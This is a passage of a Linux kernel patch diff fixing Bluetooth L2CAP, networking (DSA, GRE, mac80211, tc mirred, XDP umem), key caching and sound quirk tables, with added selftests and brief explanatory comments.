+ static void l2cap_chan_connect_reject(struct l2cap_chan *chan)
+@@ -846,7 +843,7 @@ void l2cap_chan_close(struct l2cap_chan *chan, int reason)
+ 					break;
+ 				case L2CAP_MODE_EXT_FLOWCTL:
+ 					l2cap_chan_ecred_connect_reject(chan);
+-					break;
++					return;
+ 				}
+ 			}
+ 		}
+@@ -3938,43 +3935,86 @@ void __l2cap_le_connect_rsp_defer(struct l2cap_chan *chan)
+ 		       &rsp);
+ }
+ 
+-void __l2cap_ecred_conn_rsp_defer(struct l2cap_chan *chan)
++static void l2cap_ecred_list_defer(struct l2cap_chan *chan, void *data)
+ {
++	int *result = data;
++
++	if (*result || test_bit(FLAG_ECRED_CONN_REQ_SENT, &chan->flags))
++		return;
++
++	switch (chan->state) {
++	case BT_CONNECT2:
++		/* If channel still pending accept add to result */
++		(*result)++;
++		return;
++	case BT_CONNECTED:
++		return;
++	default:
++		/* If not connected or pending accept it has been refused */
++		*result = -ECONNREFUSED;
++		return;
++	}
++}
++
++struct l2cap_ecred_rsp_data {
+ 	struct {
+ 		struct l2cap_ecred_conn_rsp rsp;
+-		__le16 dcid[5];
++		__le16 scid[L2CAP_ECRED_MAX_CID];
+ 	} __packed pdu;
++	int count;
++};
++
++static void l2cap_ecred_rsp_defer(struct l2cap_chan *chan, void *data)
++{
++	struct l2cap_ecred_rsp_data *rsp = data;
++
++	if (test_bit(FLAG_ECRED_CONN_REQ_SENT, &chan->flags))
++		return;
++
++	/* Reset ident so only one response is sent */
++	chan->ident = 0;
++
++	/* Include all channels pending with the same ident */
++	if (!rsp->pdu.rsp.result)
++		rsp->pdu.rsp.dcid[rsp->count++] = cpu_to_le16(chan->scid);
++	else
++		l2cap_chan_del(chan, ECONNRESET);
++}
++
++void __l2cap_ecred_conn_rsp_defer(struct l2cap_chan *chan)
++{
+ 	struct l2cap_conn *conn = chan->conn;
+-	u16 ident = chan->ident;
+-	int i = 0;
++	struct l2cap_ecred_rsp_data data;
++	u16 id = chan->ident;
++	int result = 0;
+ 
+-	if (!ident)
++	if (!id)
+ 		return;
+ 
+-	BT_DBG("chan %p ident %d", chan, ident);
++	BT_DBG("chan %p id %d", chan, id);
+ 
+-	pdu.rsp.mtu     = cpu_to_le16(chan->imtu);
+-	pdu.rsp.mps     = cpu_to_le16(chan->mps);
+-	pdu.rsp.credits = cpu_to_le16(chan->rx_credits);
+-	pdu.rsp.result  = cpu_to_le16(L2CAP_CR_LE_SUCCESS);
++	memset(&data, 0, sizeof(data));
+ 
+-	mutex_lock(&conn->chan_lock);
++	data.pdu.rsp.mtu     = cpu_to_le16(chan->imtu);
++	data.pdu.rsp.mps     = cpu_to_le16(chan->mps);
++	data.pdu.rsp.credits = cpu_to_le16(chan->rx_credits);
++	data.pdu.rsp.result  = cpu_to_le16(L2CAP_CR_LE_SUCCESS);
+ 
+-	list_for_each_entry(chan, &conn->chan_l, list) {
+-		if (chan->ident != ident)
+-			continue;
++	/* Verify that all channels are ready */
++	__l2cap_chan_list_id(conn, id, l2cap_ecred_list_defer, &result);
+ 
+-		/* Reset ident so only one response is sent */
+-		chan->ident = 0;
++	if (result > 0)
++		return;
+ 
+-		/* Include all channels pending with the same ident */
+-		pdu.dcid[i++] = cpu_to_le16(chan->scid);
+-	}
++	if (result < 0)
++		data.pdu.rsp.result = cpu_to_le16(L2CAP_CR_LE_AUTHORIZATION);
+ 
+-	mutex_unlock(&conn->chan_lock);
++	/* Build response */
++	__l2cap_chan_list_id(conn, id, l2cap_ecred_rsp_defer, &data);
+ 
+-	l2cap_send_cmd(conn, ident, L2CAP_ECRED_CONN_RSP,
+-			sizeof(pdu.rsp) + i * sizeof(__le16), &pdu);
++	l2cap_send_cmd(conn, id, L2CAP_ECRED_CONN_RSP,
++		       sizeof(data.pdu.rsp) + (data.count * sizeof(__le16)),
++		       &data.pdu);
+ }
+ 
+ void __l2cap_connect_rsp_defer(struct l2cap_chan *chan)
+@@ -6078,6 +6118,7 @@ static inline int l2cap_ecred_conn_req(struct l2cap_conn *conn,
+ 		__set_chan_timer(chan, chan->ops->get_sndtimeo(chan));
+ 
+ 		chan->ident = cmd->ident;
++		chan->mode = L2CAP_MODE_EXT_FLOWCTL;
+ 
+ 		if (test_bit(FLAG_DEFER_SETUP, &chan->flags)) {
+ 			l2cap_state_change(chan, BT_CONNECT2);
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index d2ea8e19aa1b5..c4a7627b380da 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -4627,12 +4627,6 @@ static int set_mgmt_mesh_func(struct sock *sk, struct hci_dev *hdev,
+ 				       MGMT_OP_SET_EXP_FEATURE,
+ 				       MGMT_STATUS_INVALID_INDEX);
+ 
+-	/* Changes can only be made when controller is powered down */
+-	if (hdev_is_powered(hdev))
+-		return mgmt_cmd_status(sk, hdev->id,
+-				       MGMT_OP_SET_EXP_FEATURE,
+-				       MGMT_STATUS_REJECTED);
+-
+ 	/* Parameters are limited to a single octet */
+ 	if (data_len != MGMT_SET_EXP_FEATURE_SIZE + 1)
+ 		return mgmt_cmd_status(sk, hdev->id,
+@@ -9351,7 +9345,8 @@ static const struct hci_mgmt_handler mgmt_handlers[] = {
+ 	{ add_ext_adv_data,        MGMT_ADD_EXT_ADV_DATA_SIZE,
+ 						HCI_MGMT_VAR_LEN },
+ 	{ add_adv_patterns_monitor_rssi,
+-				   MGMT_ADD_ADV_PATTERNS_MONITOR_RSSI_SIZE },
++				   MGMT_ADD_ADV_PATTERNS_MONITOR_RSSI_SIZE,
++						HCI_MGMT_VAR_LEN },
+ 	{ set_mesh,                MGMT_SET_MESH_RECEIVER_SIZE,
+ 						HCI_MGMT_VAR_LEN },
+ 	{ mesh_features,           MGMT_MESH_READ_FEATURES_SIZE },
+diff --git a/net/dsa/tag.c b/net/dsa/tag.c
+index b2fba1a003ce3..5105a5ff58fa2 100644
+--- a/net/dsa/tag.c
++++ b/net/dsa/tag.c
+@@ -114,7 +114,7 @@ static int dsa_switch_rcv(struct sk_buff *skb, struct net_device *dev,
+ 		skb = nskb;
+ 	}
+ 
+-	dev_sw_netstats_rx_add(skb->dev, skb->len);
++	dev_sw_netstats_rx_add(skb->dev, skb->len + ETH_HLEN);
+ 
+ 	if (dsa_skb_defer_rx_timestamp(p, skb))
+ 		return 0;
+diff --git a/net/dsa/tag_brcm.c b/net/dsa/tag_brcm.c
+index 10239daa57454..cacdafb41200e 100644
+--- a/net/dsa/tag_brcm.c
++++ b/net/dsa/tag_brcm.c
+@@ -7,6 +7,7 @@
+ 
+ #include <linux/dsa/brcm.h>
+ #include <linux/etherdevice.h>
++#include <linux/if_vlan.h>
+ #include <linux/list.h>
+ #include <linux/slab.h>
+ 
+@@ -252,6 +253,7 @@ static struct sk_buff *brcm_leg_tag_xmit(struct sk_buff *skb,
+ static struct sk_buff *brcm_leg_tag_rcv(struct sk_buff *skb,
+ 					struct net_device *dev)
+ {
++	int len = BRCM_LEG_TAG_LEN;
+ 	int source_port;
+ 	u8 *brcm_tag;
+ 
+@@ -266,12 +268,16 @@ static struct sk_buff *brcm_leg_tag_rcv(struct sk_buff *skb,
+ 	if (!skb->dev)
+ 		return NULL;
+ 
++	/* VLAN tag is added by BCM63xx internal switch */
++	if (netdev_uses_dsa(skb->dev))
++		len += VLAN_HLEN;
++
+ 	/* Remove Broadcom tag and update checksum */
+-	skb_pull_rcsum(skb, BRCM_LEG_TAG_LEN);
++	skb_pull_rcsum(skb, len);
+ 
+ 	dsa_default_offload_fwd_mark(skb);
+ 
+-	dsa_strip_etype_header(skb, BRCM_LEG_TAG_LEN);
++	dsa_strip_etype_header(skb, len);
+ 
+ 	return skb;
+ }
+diff --git a/net/ipv4/ip_gre.c b/net/ipv4/ip_gre.c
+index ffff46cdcb58f..e55a202649608 100644
+--- a/net/ipv4/ip_gre.c
++++ b/net/ipv4/ip_gre.c
+@@ -552,7 +552,7 @@ static void erspan_fb_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		truncate = true;
+ 	}
+ 
+-	nhoff = skb_network_header(skb) - skb_mac_header(skb);
++	nhoff = skb_network_offset(skb);
+ 	if (skb->protocol == htons(ETH_P_IP) &&
+ 	    (ntohs(ip_hdr(skb)->tot_len) > skb->len - nhoff))
+ 		truncate = true;
+@@ -561,7 +561,7 @@ static void erspan_fb_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		int thoff;
+ 
+ 		if (skb_transport_header_was_set(skb))
+-			thoff = skb_transport_header(skb) - skb_mac_header(skb);
++			thoff = skb_transport_offset(skb);
+ 		else
+ 			thoff = nhoff + sizeof(struct ipv6hdr);
+ 		if (ntohs(ipv6_hdr(skb)->payload_len) > skb->len - thoff)
+diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
+index 89f5f0f3f5d65..a4ecfc9d25930 100644
+--- a/net/ipv6/ip6_gre.c
++++ b/net/ipv6/ip6_gre.c
+@@ -959,7 +959,7 @@ static netdev_tx_t ip6erspan_tunnel_xmit(struct sk_buff *skb,
+ 		truncate = true;
+ 	}
+ 
+-	nhoff = skb_network_header(skb) - skb_mac_header(skb);
++	nhoff = skb_network_offset(skb);
+ 	if (skb->protocol == htons(ETH_P_IP) &&
+ 	    (ntohs(ip_hdr(skb)->tot_len) > skb->len - nhoff))
+ 		truncate = true;
+@@ -968,7 +968,7 @@ static netdev_tx_t ip6erspan_tunnel_xmit(struct sk_buff *skb,
+ 		int thoff;
+ 
+ 		if (skb_transport_header_was_set(skb))
+-			thoff = skb_transport_header(skb) - skb_mac_header(skb);
++			thoff = skb_transport_offset(skb);
+ 		else
+ 			thoff = nhoff + sizeof(struct ipv6hdr);
+ 		if (ntohs(ipv6_hdr(skb)->payload_len) > skb->len - thoff)
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index 7ca9bde3c6d25..ba6bbb6be3477 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -1285,6 +1285,9 @@ struct ieee80211_local {
+ 	struct list_head active_txqs[IEEE80211_NUM_ACS];
+ 	u16 schedule_round[IEEE80211_NUM_ACS];
+ 
++	/* serializes ieee80211_handle_wake_tx_queue */
++	spinlock_t handle_wake_tx_queue_lock;
++
+ 	u16 airtime_flags;
+ 	u32 aql_txq_limit_low[IEEE80211_NUM_ACS];
+ 	u32 aql_txq_limit_high[IEEE80211_NUM_ACS];
+diff --git a/net/mac80211/main.c b/net/mac80211/main.c
+index 846528850612a..ddf2b7811c557 100644
+--- a/net/mac80211/main.c
++++ b/net/mac80211/main.c
+@@ -802,6 +802,8 @@ struct ieee80211_hw *ieee80211_alloc_hw_nm(size_t priv_data_len,
+ 	local->aql_threshold = IEEE80211_AQL_THRESHOLD;
+ 	atomic_set(&local->aql_total_pending_airtime, 0);
+ 
++	spin_lock_init(&local->handle_wake_tx_queue_lock);
++
+ 	INIT_LIST_HEAD(&local->chanctx_list);
+ 	mutex_init(&local->chanctx_mtx);
+ 
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index 261ac667887f8..9c219e525eded 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -314,6 +314,8 @@ void ieee80211_handle_wake_tx_queue(struct ieee80211_hw *hw,
+ 	struct ieee80211_sub_if_data *sdata = vif_to_sdata(txq->vif);
+ 	struct ieee80211_txq *queue;
+ 
++	spin_lock(&local->handle_wake_tx_queue_lock);
++
+ 	/* Use ieee80211_next_txq() for airtime fairness accounting */
+ 	ieee80211_txq_schedule_start(hw, txq->ac);
+ 	while ((queue = ieee80211_next_txq(hw, txq->ac))) {
+@@ -321,6 +323,7 @@ void ieee80211_handle_wake_tx_queue(struct ieee80211_hw *hw,
+ 		ieee80211_return_txq(hw, queue, false);
+ 	}
+ 	ieee80211_txq_schedule_end(hw, txq->ac);
++	spin_unlock(&local->handle_wake_tx_queue_lock);
+ }
+ EXPORT_SYMBOL(ieee80211_handle_wake_tx_queue);
+ 
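The hunk above serializes ieee80211_handle_wake_tx_queue() behind a dedicated spinlock so concurrent wake calls cannot interleave the schedule_start/next_txq/schedule_end sequence. A hedged userspace analogue of the pattern, with pthreads standing in for the kernel locking API:

#include <pthread.h>
#include <stdio.h>

static pthread_spinlock_t wake_lock;

static void handle_wake(int ac)
{
	pthread_spin_lock(&wake_lock);
	/* schedule_start ... drain next_txq ... schedule_end */
	printf("serviced AC %d\n", ac);
	pthread_spin_unlock(&wake_lock);
}

int main(void)
{
	pthread_spin_init(&wake_lock, PTHREAD_PROCESS_PRIVATE);
	handle_wake(0);
	handle_wake(2);
	pthread_spin_destroy(&wake_lock);
	return 0;
}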
+diff --git a/net/mac80211/wme.c b/net/mac80211/wme.c
+index a12c636386801..1601be5764145 100644
+--- a/net/mac80211/wme.c
++++ b/net/mac80211/wme.c
+@@ -147,6 +147,7 @@ u16 ieee80211_select_queue_80211(struct ieee80211_sub_if_data *sdata,
+ u16 ieee80211_select_queue(struct ieee80211_sub_if_data *sdata,
+ 			   struct sta_info *sta, struct sk_buff *skb)
+ {
++	const struct ethhdr *eth = (void *)skb->data;
+ 	struct mac80211_qos_map *qos_map;
+ 	bool qos;
+ 
+@@ -154,8 +155,9 @@ u16 ieee80211_select_queue(struct ieee80211_sub_if_data *sdata,
+ 	skb_get_hash(skb);
+ 
+ 	/* all mesh/ocb stations are required to support WME */
+-	if (sta && (sdata->vif.type == NL80211_IFTYPE_MESH_POINT ||
+-		    sdata->vif.type == NL80211_IFTYPE_OCB))
++	if ((sdata->vif.type == NL80211_IFTYPE_MESH_POINT &&
++	    !is_multicast_ether_addr(eth->h_dest)) ||
++	    (sdata->vif.type == NL80211_IFTYPE_OCB && sta))
+ 		qos = true;
+ 	else if (sta)
+ 		qos = sta->sta.wme;
+diff --git a/net/sched/act_mirred.c b/net/sched/act_mirred.c
+index 7284bcea7b0b1..8037ec9b1d311 100644
+--- a/net/sched/act_mirred.c
++++ b/net/sched/act_mirred.c
+@@ -29,8 +29,8 @@
+ static LIST_HEAD(mirred_list);
+ static DEFINE_SPINLOCK(mirred_list_lock);
+ 
+-#define MIRRED_RECURSION_LIMIT    4
+-static DEFINE_PER_CPU(unsigned int, mirred_rec_level);
++#define MIRRED_NEST_LIMIT    4
++static DEFINE_PER_CPU(unsigned int, mirred_nest_level);
+ 
+ static bool tcf_mirred_is_act_redirect(int action)
+ {
+@@ -206,12 +206,19 @@ release_idr:
+ 	return err;
+ }
+ 
++static bool is_mirred_nested(void)
++{
++	return unlikely(__this_cpu_read(mirred_nest_level) > 1);
++}
++
+ static int tcf_mirred_forward(bool want_ingress, struct sk_buff *skb)
+ {
+ 	int err;
+ 
+ 	if (!want_ingress)
+ 		err = tcf_dev_queue_xmit(skb, dev_queue_xmit);
++	else if (is_mirred_nested())
++		err = netif_rx(skb);
+ 	else
+ 		err = netif_receive_skb(skb);
+ 
+@@ -226,7 +233,7 @@ TC_INDIRECT_SCOPE int tcf_mirred_act(struct sk_buff *skb,
+ 	struct sk_buff *skb2 = skb;
+ 	bool m_mac_header_xmit;
+ 	struct net_device *dev;
+-	unsigned int rec_level;
++	unsigned int nest_level;
+ 	int retval, err = 0;
+ 	bool use_reinsert;
+ 	bool want_ingress;
+@@ -237,11 +244,11 @@ TC_INDIRECT_SCOPE int tcf_mirred_act(struct sk_buff *skb,
+ 	int mac_len;
+ 	bool at_nh;
+ 
+-	rec_level = __this_cpu_inc_return(mirred_rec_level);
+-	if (unlikely(rec_level > MIRRED_RECURSION_LIMIT)) {
++	nest_level = __this_cpu_inc_return(mirred_nest_level);
++	if (unlikely(nest_level > MIRRED_NEST_LIMIT)) {
+ 		net_warn_ratelimited("Packet exceeded mirred recursion limit on dev %s\n",
+ 				     netdev_name(skb->dev));
+-		__this_cpu_dec(mirred_rec_level);
++		__this_cpu_dec(mirred_nest_level);
+ 		return TC_ACT_SHOT;
+ 	}
+ 
+@@ -310,7 +317,7 @@ TC_INDIRECT_SCOPE int tcf_mirred_act(struct sk_buff *skb,
+ 			err = tcf_mirred_forward(want_ingress, skb);
+ 			if (err)
+ 				tcf_action_inc_overlimit_qstats(&m->common);
+-			__this_cpu_dec(mirred_rec_level);
++			__this_cpu_dec(mirred_nest_level);
+ 			return TC_ACT_CONSUMED;
+ 		}
+ 	}
+@@ -322,7 +329,7 @@ out:
+ 		if (tcf_mirred_is_act_redirect(m_eaction))
+ 			retval = TC_ACT_SHOT;
+ 	}
+-	__this_cpu_dec(mirred_rec_level);
++	__this_cpu_dec(mirred_nest_level);
+ 
+ 	return retval;
+ }
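The rename from "recursion" to "nesting" matches what the counter really guards: mirred re-entering itself when a redirected packet hits another mirred rule. A minimal sketch of the guard, using a C11 thread-local where the kernel uses a per-CPU variable (function names here are hypothetical):

#include <stdio.h>

#define MIRRED_NEST_LIMIT 4

static _Thread_local unsigned int nest_level;

/* stand-in for tcf_mirred_act(): refuse once nesting exceeds the limit */
static int act(int redirects)
{
	int ret = 0;

	if (++nest_level > MIRRED_NEST_LIMIT) {
		nest_level--;
		return -1;			/* analogue of TC_ACT_SHOT */
	}
	if (redirects)
		ret = act(redirects - 1);	/* a redirect re-enters the action */
	nest_level--;
	return ret;
}

int main(void)
{
	printf("%d %d\n", act(2), act(10));	/* 0, then -1 past the limit */
	return 0;
}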
+diff --git a/net/xdp/xdp_umem.c b/net/xdp/xdp_umem.c
+index 4681e8e8ad943..02207e852d796 100644
+--- a/net/xdp/xdp_umem.c
++++ b/net/xdp/xdp_umem.c
+@@ -150,10 +150,11 @@ static int xdp_umem_account_pages(struct xdp_umem *umem)
+ 
+ static int xdp_umem_reg(struct xdp_umem *umem, struct xdp_umem_reg *mr)
+ {
+-	u32 npgs_rem, chunk_size = mr->chunk_size, headroom = mr->headroom;
+ 	bool unaligned_chunks = mr->flags & XDP_UMEM_UNALIGNED_CHUNK_FLAG;
+-	u64 npgs, addr = mr->addr, size = mr->len;
+-	unsigned int chunks, chunks_rem;
++	u32 chunk_size = mr->chunk_size, headroom = mr->headroom;
++	u64 addr = mr->addr, size = mr->len;
++	u32 chunks_rem, npgs_rem;
++	u64 chunks, npgs;
+ 	int err;
+ 
+ 	if (chunk_size < XDP_UMEM_MIN_CHUNK_SIZE || chunk_size > PAGE_SIZE) {
+@@ -188,8 +189,8 @@ static int xdp_umem_reg(struct xdp_umem *umem, struct xdp_umem_reg *mr)
+ 	if (npgs > U32_MAX)
+ 		return -EINVAL;
+ 
+-	chunks = (unsigned int)div_u64_rem(size, chunk_size, &chunks_rem);
+-	if (chunks == 0)
++	chunks = div_u64_rem(size, chunk_size, &chunks_rem);
++	if (!chunks || chunks > U32_MAX)
+ 		return -EINVAL;
+ 
+ 	if (!unaligned_chunks && chunks_rem)
+@@ -202,7 +203,7 @@ static int xdp_umem_reg(struct xdp_umem *umem, struct xdp_umem_reg *mr)
+ 	umem->headroom = headroom;
+ 	umem->chunk_size = chunk_size;
+ 	umem->chunks = chunks;
+-	umem->npgs = (u32)npgs;
++	umem->npgs = npgs;
+ 	umem->pgs = NULL;
+ 	umem->user = NULL;
+ 	umem->flags = mr->flags;
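Widening "chunks" to u64 above closes a truncation hole: mr->len is 64-bit, so dividing by a small chunk size can yield a count above U32_MAX that the old "(unsigned int)" cast silently wrapped. A userspace illustration with a hypothetical oversized registration:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
	uint64_t size = (1ULL << 43) + 2048;	/* hypothetical huge mr->len */
	uint32_t chunk_size = 2048;		/* XDP_UMEM_MIN_CHUNK_SIZE */
	uint64_t chunks = size / chunk_size;	/* 2^32 + 1 */

	/* the old cast kept only the low 32 bits: 4294967297 -> 1 */
	printf("chunks=%llu truncated=%u\n",
	       (unsigned long long)chunks, (uint32_t)chunks);
	return 0;
}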
+diff --git a/security/keys/request_key.c b/security/keys/request_key.c
+index 2da4404276f0f..07a0ef2baacd8 100644
+--- a/security/keys/request_key.c
++++ b/security/keys/request_key.c
+@@ -38,9 +38,12 @@ static void cache_requested_key(struct key *key)
+ #ifdef CONFIG_KEYS_REQUEST_CACHE
+ 	struct task_struct *t = current;
+ 
+-	key_put(t->cached_requested_key);
+-	t->cached_requested_key = key_get(key);
+-	set_tsk_thread_flag(t, TIF_NOTIFY_RESUME);
++	/* Do not cache key if it is a kernel thread */
++	if (!(t->flags & PF_KTHREAD)) {
++		key_put(t->cached_requested_key);
++		t->cached_requested_key = key_get(key);
++		set_tsk_thread_flag(t, TIF_NOTIFY_RESUME);
++	}
+ #endif
+ }
+ 
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 36314753923b8..4a69ce702360c 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -255,6 +255,20 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "15NBC1011"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "OMEN by HP Gaming Laptop 16z-n000"),
++		}
++	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8A43"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/intel/boards/sof_rt5682.c b/sound/soc/intel/boards/sof_rt5682.c
+index 71a11d747622a..4fe448295a902 100644
+--- a/sound/soc/intel/boards/sof_rt5682.c
++++ b/sound/soc/intel/boards/sof_rt5682.c
+@@ -223,6 +223,20 @@ static const struct dmi_system_id sof_rt5682_quirk_table[] = {
+ 					SOF_RT5682_SSP_AMP(2) |
+ 					SOF_RT5682_NUM_HDMIDEV(4)),
+ 	},
++	{
++		.callback = sof_rt5682_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_PRODUCT_FAMILY, "Google_Rex"),
++			DMI_MATCH(DMI_OEM_STRING, "AUDIO-MAX98360_ALC5682I_I2S"),
++		},
++		.driver_data = (void *)(SOF_RT5682_MCLK_EN |
++					SOF_RT5682_SSP_CODEC(2) |
++					SOF_SPEAKER_AMP_PRESENT |
++					SOF_MAX98360A_SPEAKER_AMP_PRESENT |
++					SOF_RT5682_SSP_AMP(0) |
++					SOF_RT5682_NUM_HDMIDEV(4)
++					),
++	},
+ 	{
+ 		.callback = sof_rt5682_quirk_cb,
+ 		.matches = {
+@@ -1105,6 +1119,15 @@ static const struct platform_device_id board_ids[] = {
+ 					SOF_RT5682_SSP_AMP(1) |
+ 					SOF_RT5682_NUM_HDMIDEV(4)),
+ 	},
++	{
++		.name = "mtl_mx98360_rt5682",
++		.driver_data = (kernel_ulong_t)(SOF_RT5682_MCLK_EN |
++					SOF_RT5682_SSP_CODEC(0) |
++					SOF_SPEAKER_AMP_PRESENT |
++					SOF_MAX98360A_SPEAKER_AMP_PRESENT |
++					SOF_RT5682_SSP_AMP(1) |
++					SOF_RT5682_NUM_HDMIDEV(4)),
++	},
+ 	{
+ 		.name = "jsl_rt5682",
+ 		.driver_data = (kernel_ulong_t)(SOF_RT5682_MCLK_EN |
+diff --git a/sound/soc/intel/common/soc-acpi-intel-mtl-match.c b/sound/soc/intel/common/soc-acpi-intel-mtl-match.c
+index b1a66a0f68181..7911c3af8071f 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-mtl-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-mtl-match.c
+@@ -15,6 +15,11 @@ static const struct snd_soc_acpi_codecs mtl_max98357a_amp = {
+ 	.codecs = {"MX98357A"}
+ };
+ 
++static const struct snd_soc_acpi_codecs mtl_max98360a_amp = {
++	.num_codecs = 1,
++	.codecs = {"MX98360A"}
++};
++
+ static const struct snd_soc_acpi_codecs mtl_rt5682_rt5682s_hp = {
+ 	.num_codecs = 2,
+ 	.codecs = {"10EC5682", "RTL5682"},
+@@ -28,6 +33,13 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_mtl_machines[] = {
+ 		.quirk_data = &mtl_max98357a_amp,
+ 		.sof_tplg_filename = "sof-mtl-max98357a-rt5682.tplg",
+ 	},
++	{
++		.comp_ids = &mtl_rt5682_rt5682s_hp,
++		.drv_name = "mtl_mx98360_rt5682",
++		.machine_quirk = snd_soc_acpi_codec_list,
++		.quirk_data = &mtl_max98360a_amp,
++		.sof_tplg_filename = "sof-mtl-max98360a-rt5682.tplg",
++	},
+ 	{},
+ };
+ EXPORT_SYMBOL_GPL(snd_soc_acpi_intel_mtl_machines);
+diff --git a/tools/bootconfig/test-bootconfig.sh b/tools/bootconfig/test-bootconfig.sh
+index f68e2e9eef8b2..a2c484c243f5d 100755
+--- a/tools/bootconfig/test-bootconfig.sh
++++ b/tools/bootconfig/test-bootconfig.sh
+@@ -87,10 +87,14 @@ xfail grep -i "error" $OUTFILE
+ 
+ echo "Max node number check"
+ 
+-echo -n > $TEMPCONF
+-for i in `seq 1 1024` ; do
+-   echo "node$i" >> $TEMPCONF
+-done
++awk '
++BEGIN {
++  for (i = 0; i < 26; i += 1)
++      printf("%c\n", 65 + i % 26)
++  for (i = 26; i < 8192; i += 1)
++      printf("%c%c%c\n", 65 + i % 26, 65 + (i / 26) % 26, 65 + (i / 26 / 26))
++}
++' > $TEMPCONF
+ xpass $BOOTCONF -a $TEMPCONF $INITRD
+ 
+ echo "badnode" >> $TEMPCONF
+diff --git a/tools/testing/selftests/bpf/prog_tests/btf.c b/tools/testing/selftests/bpf/prog_tests/btf.c
+index de1b5b9eb93a8..d8d1292e73b53 100644
+--- a/tools/testing/selftests/bpf/prog_tests/btf.c
++++ b/tools/testing/selftests/bpf/prog_tests/btf.c
+@@ -879,6 +879,34 @@ static struct btf_raw_test raw_tests[] = {
+ 	.btf_load_err = true,
+ 	.err_str = "Invalid elem",
+ },
++{
++	.descr = "var after datasec, ptr followed by modifier",
++	.raw_types = {
++		/* .bss section */				/* [1] */
++		BTF_TYPE_ENC(NAME_TBD, BTF_INFO_ENC(BTF_KIND_DATASEC, 0, 2),
++			sizeof(void*)+4),
++		BTF_VAR_SECINFO_ENC(4, 0, sizeof(void*)),
++		BTF_VAR_SECINFO_ENC(6, sizeof(void*), 4),
++		/* int */					/* [2] */
++		BTF_TYPE_INT_ENC(0, BTF_INT_SIGNED, 0, 32, 4),
++		/* int* */					/* [3] */
++		BTF_TYPE_ENC(0, BTF_INFO_ENC(BTF_KIND_PTR, 0, 0), 2),
++		BTF_VAR_ENC(NAME_TBD, 3, 0),			/* [4] */
++		/* const int */					/* [5] */
++		BTF_TYPE_ENC(0, BTF_INFO_ENC(BTF_KIND_CONST, 0, 0), 2),
++		BTF_VAR_ENC(NAME_TBD, 5, 0),			/* [6] */
++		BTF_END_RAW,
++	},
++	.str_sec = "\0a\0b\0c\0",
++	.str_sec_size = sizeof("\0a\0b\0c\0"),
++	.map_type = BPF_MAP_TYPE_ARRAY,
++	.map_name = ".bss",
++	.key_size = sizeof(int),
++	.value_size = sizeof(void*)+4,
++	.key_type_id = 0,
++	.value_type_id = 1,
++	.max_entries = 1,
++},
+ /* Test member exceeds the size of struct.
+  *
+  * struct A {
+diff --git a/tools/testing/selftests/net/forwarding/tc_actions.sh b/tools/testing/selftests/net/forwarding/tc_actions.sh
+index 1e0a62f638fec..919c0dd9fe4bc 100755
+--- a/tools/testing/selftests/net/forwarding/tc_actions.sh
++++ b/tools/testing/selftests/net/forwarding/tc_actions.sh
+@@ -3,7 +3,8 @@
+ 
+ ALL_TESTS="gact_drop_and_ok_test mirred_egress_redirect_test \
+ 	mirred_egress_mirror_test matchall_mirred_egress_mirror_test \
+-	gact_trap_test mirred_egress_to_ingress_test"
++	gact_trap_test mirred_egress_to_ingress_test \
++	mirred_egress_to_ingress_tcp_test"
+ NUM_NETIFS=4
+ source tc_common.sh
+ source lib.sh
+@@ -198,6 +199,52 @@ mirred_egress_to_ingress_test()
+ 	log_test "mirred_egress_to_ingress ($tcflags)"
+ }
+ 
++mirred_egress_to_ingress_tcp_test()
++{
++	local tmpfile=$(mktemp) tmpfile1=$(mktemp)
++
++	RET=0
++	dd conv=sparse status=none if=/dev/zero bs=1M count=2 of=$tmpfile
++	tc filter add dev $h1 protocol ip pref 100 handle 100 egress flower \
++		$tcflags ip_proto tcp src_ip 192.0.2.1 dst_ip 192.0.2.2 \
++			action ct commit nat src addr 192.0.2.2 pipe \
++			action ct clear pipe \
++			action ct commit nat dst addr 192.0.2.1 pipe \
++			action ct clear pipe \
++			action skbedit ptype host pipe \
++			action mirred ingress redirect dev $h1
++	tc filter add dev $h1 protocol ip pref 101 handle 101 egress flower \
++		$tcflags ip_proto icmp \
++			action mirred ingress redirect dev $h1
++	tc filter add dev $h1 protocol ip pref 102 handle 102 ingress flower \
++		ip_proto icmp \
++			action drop
++
++	ip vrf exec v$h1 nc --recv-only -w10 -l -p 12345 -o $tmpfile1  &
++	local rpid=$!
++	ip vrf exec v$h1 nc -w1 --send-only 192.0.2.2 12345 <$tmpfile
++	wait -n $rpid
++	cmp -s $tmpfile $tmpfile1
++	check_err $? "server output check failed"
++
++	$MZ $h1 -c 10 -p 64 -a $h1mac -b $h1mac -A 192.0.2.1 -B 192.0.2.1 \
++		-t icmp "ping,id=42,seq=5" -q
++	tc_check_packets "dev $h1 egress" 101 10
++	check_err $? "didn't mirred redirect ICMP"
++	tc_check_packets "dev $h1 ingress" 102 10
++	check_err $? "didn't drop mirred ICMP"
++	local overlimits=$(tc_rule_stats_get ${h1} 101 egress .overlimits)
++	test ${overlimits} = 10
